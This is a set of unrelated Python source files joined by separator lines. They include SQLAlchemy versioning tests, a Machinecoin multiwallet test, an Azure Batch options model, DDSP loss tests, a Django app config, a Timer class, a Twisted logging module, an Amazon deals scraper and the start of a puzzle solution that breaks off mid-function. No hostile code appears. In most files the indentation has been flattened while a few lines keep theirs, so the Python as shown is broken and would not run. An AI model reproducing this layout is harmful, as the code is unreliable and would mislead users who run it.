BaseClassHistory(id=2, name=u'base1mod', type=u'base', version=2),
SubClassSamePkHistory(id=3, name=u'same1', type=u'same', version=1),
SubClassSamePkHistory(id=3, name=u'same1', type=u'same', version=2)
]
)
def test_single_inheritance(self):
class BaseClass(Base, ComparableEntity):
__tablename__ = 'basetable'
id = Column(Integer, primary_key=True)
name = Column(String(50))
type = Column(String(50))
__mapper_args__ = {'polymorphic_on':type, 'polymorphic_identity':'base'}
class SubClass(BaseClass):
subname = Column(String(50))
__mapper_args__ = {'polymorphic_identity':'sub'}
self.create_tables()
sess = Session()
b1 = BaseClass(name='b1')
sc = SubClass(name='s1', subname='sc1')
sess.add_all([b1, sc])
sess.commit()
        b1.name = 'b1modified'
BaseClassHistory = BaseClass.__history_mapper__.class_
SubClassHistory = SubClass.__history_mapper__.class_
eq_(
sess.query(BaseClassHistory).order_by(BaseClassHistory.id, BaseClassHistory.version).all(),
[BaseClassHistory(id=1, name=u'b1', type=u'base', version=1)]
)
        sc.name = 's1modified'
        b1.name = 'b1modified2'
eq_(
sess.query(BaseClassHistory).order_by(BaseClassHistory.id, BaseClassHistory.version).all(),
[
BaseClassHistory(id=1, name=u'b1', type=u'base', version=1),
BaseClassHistory(id=1, name=u'b1modified', type=u'base', version=2),
SubClassHistory(id=2, name=u's1', type=u'sub', version=1)
]
)
def test_unique(self):
class SomeClass(Base, ComparableEntity):
__tablename__ = 'sometable'
id = Column(Integer, primary_key=True)
name = Column(String(50), unique=True)
data = Column(String(50))
self.create_tables()
sess = Session()
sc = SomeClass(name='sc1', data='sc1')
sess.add(sc)
sess.commit()
sc.data = 'sc1modified'
sess.commit()
assert sc.version == 2
sc.data = 'sc1modified2'
sess.commit()
assert sc.version == 3
|
#!/usr/bin/env python3
# Copyright (c) 2017-2018 The Machinecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a machinecoind node can load multiple wallet files
"""
import os
import shutil
import time
from test_framework.test_framework import MachinecoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class MultiWalletTest(MachinecoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.supports_cli = True
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, 'regtest', *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir('wallet.dat')), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
os.rename(wallet_dir("wallet.dat"), wallet_dir("w8"))
# create another dummy wallet for use in testing backups later
self.start_node(0, [])
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_dir("wallet.dat"), empty_wallet)
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly
# '' - to verify default wallet file is created correctly
wallet_names = ['w1', 'w2', 'w3', 'w', 'sub/w5', os.path.join(self.options.tmpdir, 'extern/w6'), 'w7_symlink', 'w8', '']
extra_args = ['-wallet={}'.format(n) for n in wallet_names]
self.start_node(0, extra_args)
assert_equal(set(node.listwallets()), set(wallet_names))
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
# should not initialize if wallet path can't be created
exp_stderr = "boost::filesystem::create_directory: (The system cannot find the path specified|Not a directory):"
self.nodes[0].assert_start_raises_init_error(['-wallet=wallet.dat/bad'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
# should not initialize if there are duplicate wallets
self.nodes[0].assert_start_raises_init_error(['-wallet=w1', '-wallet=w1'], 'Error: Error loading wallet w1. Duplicate -wallet filename specified.')
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
exp_stderr = "BerkeleyBatch: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
        self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r"Error: Invalid -wallet path 'w8_symlink'\. .*", match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -zapwallettxes with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-zapwallettxes', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.nodes[0].assert_start_raises_init_error(['-zapwallettxes=1', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.nodes[0].assert_start_raises_init_error(['-zapwallettxes=2', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.log.info("Do not allow -salvagewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-salvagewallet', '-wallet=w1', '-wallet=w2'], "Error: -salvagewallet is only allowed with a single wallet file")
self.nodes[0].assert_start_raises_init_error(['-salvagewallet=1', '-wallet=w1', '-wallet=w2'], "Error: -salvagewallet is only allowed with a single wallet file")
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet', '-wallet=w1', '-wallet=w2'], "Error: -upgradewallet is only allowed with a single wallet file")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet=1', '-wallet=w1', '-wallet=w2'], "Error: -upgradewallet is only allowed with a single wallet file")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0, ['-wallet=w4', '-wallet=w5'])
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5.generate(1)
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-wallet=w4', '-wallet=w5', '-walletdir=' + data_dir()])
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-walletdir=' + competing_wallet_dir])
exp_stderr = "Error: Error initializing wallet database environment \"\S+competing_walletdir\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0, extra_args)
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
wallets[0].generate(1)
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
w1.generate(101)
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
w1.generate(1)
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], "regtest")
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(4.0)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 4.0)
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-32601, "Method not found", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
assert_raises_rpc_error(-18, 'Wallet wallets not found.', self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
assert_raises_rpc_error(-4, 'Wallet file verification failed: Error loading wallet w1. Duplicate -wallet filename specified.', self.nodes[0].loadwallet, wallet_names[0])
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-1, "BerkeleyBatch: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed: Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
assert_raises_rpc_error(-18, "Directory empty_wallet_dir does not contain a wallet.dat file", self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
assert_raises_rpc_error(-4, "Wallet w2 already exists.", self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "Cannot unload the requested wallet", w1.unloadwallet, "w2"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
wallets = node.listwallets()
w2.encryptwallet('test')
self.restart_node(0, ['-wallet={}'.format(wallet) for wallet in wallets])
w1 = node.get_wallet_rpc(wallet_names[0])
w2 = node.get_wallet_rpc(wallet_names[1])
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-32601, "Method not found (wallet method is disabled because no wallet is loaded)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
if __name__ == '__main__':
MultiWalletTest().main()
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class TaskReactivateOptions(Model):
"""Additional parameters for reactivate operation.
:param timeout: The maximum time that the server can spend processing the
request, in seconds. The default is 30 seconds. Default value: 30 .
:type timeout: int
:param client_request_id: The caller-generated request identity, in the
form of a GUID with no decoration such as curly braces, e.g.
9C4D50EE-2D56-4CD3-8152-34347DC9F2B0.
:type client_request_id: str
:param return_client_request_id: Whether the server should return the
     client-request-id in the response. Default value: False.
:type return_client_request_id: bool
:param ocp_date: The time the request was issued. Client libraries
typically set this to the current system clock time; set it explicitly if
you are calling the REST API directly.
:type ocp_date: datetime
:param if_match: An ETag value associated with the version of the resource
known to the client. The operation will be performed only if the
resource's current ETag on the service exactly matches the value specified
by the client.
:type if_match: str
:param if_none_match: An ETag value associated with the version of the
resource known to the client. The operation will be performed only if the
resource's current ETag on the service does not match the value specified
by the client.
:type if_none_match: str
:param if_modified_since: A timestamp indicating the last modified time of
the resource known to the client. The operation will be performed only if
the resource on the service has been modified since the specified time.
:type if_modified_since: datetime
:param if_unmodified_since: A timestamp indicating the last modified time
of the resource known to the client. The operation will be performed only
if the resource on the service has not been modified since the specified
time.
:type if_unmodified_since: datetime
"""
def __init__(self, timeout=30, client_request_id=None, return_client_request_id=False, ocp_date=None, if_match=None, if_none_match=None, if_modified_since=None, if_unmodified_since=None):
super(TaskReactivateOptions, self).__init__()
self.timeout = timeout
self.client_request_id = client_request_id
self.return_client_request_id = return_client_request_id
self.ocp_date = ocp_date
self.if_match = if_match
self.if_none_match = if_none_match
self.if_modified_since = if_modified_since
self.if_unmodified_since = if_unmodified_since
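# Illustrative usage sketch (not part of the generated model; assumes the
# msrest package is installed): build the options object with a custom timeout
# and the example client request id from the docstring above.
if __name__ == '__main__':
    options = TaskReactivateOptions(
        timeout=60,
        client_request_id='9C4D50EE-2D56-4CD3-8152-34347DC9F2B0',
        return_client_request_id=True)
    print(options.timeout, options.client_request_id)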
|
# Copyright 2021 The DDSP Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for ddsp.losses."""
from ddsp import core
from ddsp import losses
import numpy as np
import tensorflow as tf
class LossGroupTest(tf.test.TestCase):
def setUp(self):
"""Create some dummy input data for the chain."""
super().setUp()
# Create a network output dictionary.
self.nn_outputs = {
'audio': tf.ones((3, 8000), dtype=tf.float32),
'audio_synth': tf.ones((3, 8000), dtype=tf.float32),
'magnitudes': tf.ones((3, 200, 2), dtype=tf.float32),
'f0_hz': 200 + tf.ones((3, 200, 1), dtype=tf.float32),
}
# Create Processors.
spectral_loss = losses.SpectralLoss()
crepe_loss = losses.PretrainedCREPEEmbeddingLoss(name='crepe_loss')
# Create DAG for testing.
self.dag = [
(spectral_loss, ['audio', 'audio_synth']),
(crepe_loss, ['audio', 'audio_synth']),
]
self.expected_outputs = [
'spectral_loss',
'crepe_loss'
]
def _check_tensor_outputs(self, strings_to_check, outputs):
for tensor_string in strings_to_check:
tensor = core.nested_lookup(tensor_string, outputs)
self.assertIsInstance(tensor, (np.ndarray, tf.Tensor))
def test_dag_construction(self):
"""Tests if DAG is built properly and runs.
"""
loss_group = losses.LossGroup(dag=self.dag)
loss_outputs = loss_group(self.nn_outputs)
self.assertIsInstance(loss_outputs, dict)
self._check_tensor_outputs(self.expected_outputs, loss_outputs)
class SpectralLossTest(tf.test.TestCase):
def test_output_shape_is_correct(self):
"""Test correct shape with all losses active."""
loss_obj = losses.SpectralLoss(
mag_weight=1.0,
delta_time_weight=1.0,
delta_freq_weight=1.0,
cumsum_freq_weight=1.0,
logmag_weight=1.0,
loudness_weight=1.0,
)
input_audio = tf.ones((3, 8000), dtype=tf.float32)
target_audio = tf.ones((3, 8000), dtype=tf.float32)
loss = loss_obj(input_audio, target_audio)
self.assertListEqual([], loss.shape.as_list())
self.assertTrue(np.isfinite(loss))
class PretrainedCREPEEmbeddingLossTest(tf.test.TestCase):
def test_output_shape_is_correct(self):
loss_obj = losses.PretrainedCREPEEmbeddingLoss()
input_audio = tf.ones((3, 16000), dtype=tf.float32)
target_audio = tf.ones((3, 16000), dtype=tf.float32)
loss = loss_obj(input_audio, target_audio)
self.assertListEqual([], loss.shape.as_list())
self.assertTrue(np.isfinite(loss))
if __name__ == '__main__':
tf.test.main()
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2018 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import os
from django.apps import AppConfig as BaseAppConfig
def run_setup_hooks(*args, **kwargs):
from django.conf import settings
from .celeryapp import app as celeryapp
LOCAL_ROOT = os.path.abspath(os.path.dirname(__file__))
settings.TEMPLATES[0]["DIRS"].insert(0, os.path.join(LOCAL_ROOT, "templates"))
if celeryapp not in settings.INSTALLED_APPS:
settings.INSTALLED_APPS += (celeryapp, )
class AppConfig(BaseAppConfig):
name = "nexus"
label = "nexus"
def ready(self):
super(AppConfig, self).ready()
run_setup_hooks()
|
from time import time
class Timer:
"""
Simple class for checking time
"""
def __init__(self):
self.start_time: float = -1
self.end_time: float = -1
self.duration: float = -1
def start(self):
self.start_time = time()
def stop(self):
self.end_time = time()
self.duration = self.end_time - self.start_time
def reset(self):
self.start_time = -1
self.end_time = -1
self.duration = -1
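# Minimal usage sketch (illustrative, not part of the original class): time a
# short sleep and read back the measured duration.
if __name__ == "__main__":
    from time import sleep
    timer = Timer()
    timer.start()
    sleep(0.1)
    timer.stop()
    print(f"slept for roughly {timer.duration:.3f} seconds")
    timer.reset()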
|
# Copyright 2008-2009 ITA Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Twisted logging with log levels"""
import os
import sys
import time
from twisted.python import log, logfile, failure, util
# Log levels:
LEVELS = (
"ERROR", # 0
"WARN", # 1
"INFO", # 2
"DEBUG", # 3
"TRACE", # 4
)
_logger = None
class TotalLogFile(logfile.LogFile):
"""A log file that can optionally steal stdio"""
def __init__(self, name, directory, steal_stdio=False, **kwargs):
self._steal_stdio = steal_stdio
self._null_fd = os.open("/dev/null", os.O_RDWR)
logfile.LogFile.__init__(self, name, directory, **kwargs)
def _do_stdio(self):
file_fd = self._file.fileno()
os.dup2(self._null_fd, 0)
os.dup2(file_fd, 1)
os.dup2(file_fd, 2)
def _openFile(self):
logfile.LogFile._openFile(self)
if self._steal_stdio:
self._do_stdio()
def stdio(self):
self._steal_stdio = True
if not self.closed:
self._do_stdio()
def close(self):
os.dup2(self._null_fd, 1)
os.dup2(self._null_fd, 2)
logfile.LogFile.close(self)
class LogLevelObserver(object):
"""A file log observer with log levels and rotation"""
time_format = "%Y-%m-%dT%H:%M:%S %Z"
def __init__(self, log_name=None, log_level="INFO"):
assert log_level in LEVELS
self.log_level = list(LEVELS).index(log_level)
self.stdio_stolen = False
if log_name:
dirname, basename = os.path.split(os.path.abspath(log_name))
if not os.path.exists(dirname):
os.makedirs(dirname)
self.log_file = TotalLogFile(basename, dirname,
rotateLength=1024*1024*20, maxRotatedFiles=20)
self.log_stderr = sys.stderr
else:
self.log_file = sys.stdout
self.log_stderr = None
def start(self):
"""Setup logging using this observer"""
log.startLoggingWithObserver(self.emit, setStdout=0)
def stdio(self):
"""Steal stdout/err and log them"""
if isinstance(self.log_file, TotalLogFile):
self.stdio_stolen = True
self.log_file.stdio()
def emit(self, event):
"""Twisted log observer event handler"""
# All exceptions here will normally be lost. Attempt to log
# any problems to the original stderr in hopes that it is visible
try:
if event.get('isError', False):
level = 0 # ERROR
# HACK! tcp.Port and udp.Port like to announce themselves
# loudly but I don't want them to (well UDP at least). This
# seemed like an easier option than re-implementing things.
# Also catch all starting/stopping factory noise if it exists.
elif ('log_level' not in event and event.get('message', None) and
(event['message'][0].startswith(
'nagcat.plugins.query_ntp.NTPProtocol starting on') or
(event['message'][0].startswith('(Port ') and
event['message'][0].endswith(' Closed)'))) or
event['message'][0].startswith('Starting factory') or
event['message'][0].startswith('Stopping factory')):
level = 3 # DEBUG
else:
level = event.get('log_level', 2) # INFO
if self.log_level < level:
return
text = log.textFromEventDict(event)
text = text.replace("\n", "\n ")
date = time.strftime(self.time_format,
time.localtime(event.get('time', None)))
line = "%s [%s] %s\n" % (date, LEVELS[level], text)
util.untilConcludes(self.log_file.write, line)
util.untilConcludes(self.log_file.flush)
# During init stderr is used to provide loud errors to the
# console in addition to the log file to make things obvious.
if not self.stdio_stolen and level <= 1:
util.untilConcludes(self.log_stderr.write, line)
util.untilConcludes(self.log_stderr.flush)
except:
if not self.stdio_stolen:
self.log_stderr.write("%s" % failure.Failure())
def init(log_name, log_level):
"""Initialize the logger (in global scope)"""
global _logger
assert _logger is None
_logger = LogLevelObserver(log_name, log_level)
_logger.start()
def init_stdio():
"""Signal the logger to steal sys.stdout/err"""
_logger.stdio()
def _level_factory(index, name):
"""Setup the log level helper functions"""
def msg(text, *args):
if _logger and _logger.log_level < index:
return
text = str(text)
if args:
text = text % args
log.msg(text, log_level=index)
msg.__doc__ = "Log text at level %s" % name
msg.__name__ = name.lower()
globals()[msg.__name__] = msg
for index, name in enumerate(LEVELS):
_level_factory(index, name)
del index, name
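# Illustrative usage sketch (not part of the original module; assumes Twisted is
# installed): initialise the observer writing to stdout at DEBUG level, then
# call the level helpers generated by _level_factory above. Only INFO/DEBUG and
# TRACE are used here because the stdout-only observer has no separate stderr
# stream for error-level output.
if __name__ == "__main__":
    init(None, "DEBUG")
    info("logger initialised at %s level", "DEBUG")
    debug("debug output is visible because the configured level is DEBUG")
    trace("trace output is filtered out at DEBUG level")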
|
import scrapy
from ..items import DealsItem
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
import time
class DealsSpider(scrapy.Spider):
name = 'deals'
allowed_domains = ['amazon.com', 'amazon.co.uk']
    # Keep a running count so an optional limit on how many pages to crawl can be enforced
count = 1
    def __init__(self, q, dom=None, pages=None, dep=None):
        self.q = q  # Shared multiprocessing list passed in by the caller
        self.pages = pages  # Page crawl limit
        self.dom = dom  # "uk" targets amazon.co.uk; anything else defaults to amazon.com
        self.dep = dep  # Department name; must match the category text used on the site
options = Options()
options.headless = True
self.driver = webdriver.Firefox(options=options)
        # Decide which callback start_requests() below should use:
        # if a department was selected it goes to dep_parse(), otherwise to parse().
        if self.dep is not None:
self.noDep = self.dep_parse
else:
self.noDep = self.parse
def start_requests(self):
if self.dom == "uk":
url = "https://www.amazon.co.uk/gp/goldbox/"
else:
#usa url will be the default
url = 'https://www.amazon.com/international-sales-offers/b/?ie=UTF8&node=15529609011'
self.driver.get(url)
yield scrapy.Request(url=url, callback=self.noDep)
def dep_parse(self,response):
time.sleep(3)
#Below we are loading the names of all the categories
if self.dom == "uk":
depts = self.driver.find_elements_by_css_selector("span.a-declarative [class='a-checkbox checkbox a-spacing-micro']")
else:#USA
#Need to expand list of all departments on US site
self.driver.find_element_by_css_selector("div.a-expander-inline-container span.a-expander-prompt").click()
time.sleep(1)
depts = self.driver.find_elements_by_css_selector("div.a-expander-inline-container span.a-declarative")
for dept in depts:
department = dept.find_element_by_css_selector("label span.a-checkbox-label").text
#Click the checkbox of the department specified by the user,
#then go to the parse function to scrape.
if self.dep == department:
dept.find_element_by_css_selector("label input").click()
link=self.driver.current_url
yield scrapy.Request(link, callback=self.parse, dont_filter=True)
break
def parse(self, response):
time.sleep(10) #Makes sure all the results will show
results = self.driver.find_elements_by_css_selector("div.a-row div.a-spacing-none.tallCellView")
        # `results` holds every page section that contains a product
items = DealsItem()
for result in results:
try:
items["Product"] = result.find_element_by_css_selector("a.singleCellTitle span.a-declarative").text
except:
items["Product"] = "N/A"
try:
items["Price"] = result.find_element_by_css_selector("span.dealPriceText").text
except:
items["Price"] = "N/A"
try:
items["Pre_Price"] = result.find_element_by_css_selector("span.a-text-strike").text
except:
items["Pre_Price"] = "N/A"
try:
items["Rating"] = result.find_element_by_css_selector("div.reviewStars a.touchAnchor").get_attribute("aria-label").split(",")[0]
except:
items["Rating"] = "N/A"
try:
items["No_of_Ratings"] = int(result.find_element_by_css_selector("span.a-declarative span.a-size-small").text)
except:
items["No_of_Ratings"] = "N/A"
try:
items["Timer"] = result.find_element_by_css_selector("span[role='timer']").text
except:
items["Timer"] = "N/A"
try:
items["Claimed"] = result.find_element_by_css_selector("div.a-span5 span.a-size-mini").text
except:
items["Claimed"] = "N/A"
try:
items["URL"] = result.find_element_by_css_selector("a.a-link-normal[href]").get_attribute("href")
except:
items["URL"] = "N/A"
try:
items["IMG_URL"] = result.find_element_by_css_selector("img[src]").get_attribute("src")
except:
items["IMG_URL"] = "N/A"
yield items
        try:  # Follow the pagination "next" link, if there is one
NEXT_PAGE_SELECTOR = "[class='a-text-center'] ul.a-pagination li.a-last a[href]"
next_page = self.driver.find_element_by_css_selector(NEXT_PAGE_SELECTOR)
next_link = next_page.get_attribute("href")
next_page.click()
except:
next_page = None
#This will make sure to continue looping through all pages if a page limit is not set.
#If a limit is set, it makes sure to stay within the limit.
        if next_page is not None and (self.pages is None or self.count < self.pages):
            self.count += 1
yield scrapy.Request(response.urljoin(next_link), callback=self.parse, dont_filter=True)
else:
self.driver.quit()
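# Illustrative launch sketch (comments only; none of this is in the original
# file). The spider expects a shared list-like `q` plus optional domain, page
# limit, and department arguments, so a run might look roughly like:
#
#     from multiprocessing import Manager
#     from scrapy.crawler import CrawlerProcess
#     q = Manager().list()
#     process = CrawlerProcess()
#     process.crawl(DealsSpider, q=q, dom="uk", pages=2, dep=None)
#     process.start()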
|
"""
day 12
"""
from part_1 import read_input, manhatten
def rotate(wayp_y, wayp_x, pos_y, pos_x, degrees):
delta_wayp_y = wayp_y - pos_y
delta_wayp_x = wayp_x - pos_x
if degrees == 90:
wayp_y = pos_y - delta_wayp_x
wayp_x = pos_x + delta_wayp_y
elif degrees == 180:
wayp_y = pos_y - delta_wayp_y
